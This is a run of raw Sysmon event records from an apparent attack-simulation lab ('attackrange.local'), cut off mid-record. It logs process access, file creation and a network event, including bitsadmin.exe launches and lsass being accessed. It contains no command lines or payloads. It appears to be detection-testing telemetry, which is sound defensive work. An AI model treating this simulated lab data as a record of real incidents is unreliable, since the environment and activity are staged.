12:25:39.640{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02A2-6088-122A-00000000BB01}6212C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293216Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.505{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0F058846031FDFA2CC8905A8FA0D34AE,SHA256=663E9D81E824F168F2EEEC3B7C02EBD6D0F9A18CA6D15F536232B4D5282726C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293215Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.505{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0996801803DB5CD68760A1FA12B6DEA1,SHA256=FE56C04BDB1455E2686B705927D2E3EC6E9A0F5D8EA7FD0C45006D1DCEE3068E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293214Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.174{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000293213Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:36.385{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50661-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293212Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:39.139{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C30A60252BD8990AED64AF37671202AF,SHA256=6E8060B816C0249519224D3446BDE2F02C9CAE149D8A27CD3503B39EFC7319E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441526Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:40.266{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441525Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:40.266{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441524Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:40.058{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF557A9A544C1E9EC5685855E82AF00,SHA256=0A84D305AF0A26D348959356CE3A018ACBE5465C95C8F0B8A54C04E7F6514C6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293224Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:40.672{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BD562E804A1CD538FC3A92C1E357EFA,SHA256=D3F08F4274019AA6E5716582E7388A5D8D2D33F094774593CE09609DE811A929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293223Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:40.672{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0F058846031FDFA2CC8905A8FA0D34AE,SHA256=663E9D81E824F168F2EEEC3B7C02EBD6D0F9A18CA6D15F536232B4D5282726C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293222Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:40.173{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E46A79913FC222884A45173B8CE501D,SHA256=5F9D7D7486C2791BCEE2437B8048D6EF54DEAD3A9023759B4D9710D9CDB49552,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441529Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:41.267{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441528Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:41.267{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441527Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:41.066{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4A1E9AF7808AAE3AE55DFB81612CEA,SHA256=DA3F956A8838D64D79A8A3953B863987CFB08281A44541D7444F8500FB20B5E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293253Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.334{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293252Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.319{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293251Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.319{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293250Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.319{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293249Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.319{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293248Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293247Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293246Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293245Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293244Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293243Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293242Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293241Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293240Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293239Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293238Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293237Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293236Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293235Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.303{BEA10069-02C5-6088-242A-00000000BB01}59927072C:\Windows\system32\conhost.exe{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293234Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-02C5-6088-242A-00000000BB01}5992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293233Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293232Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293231Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 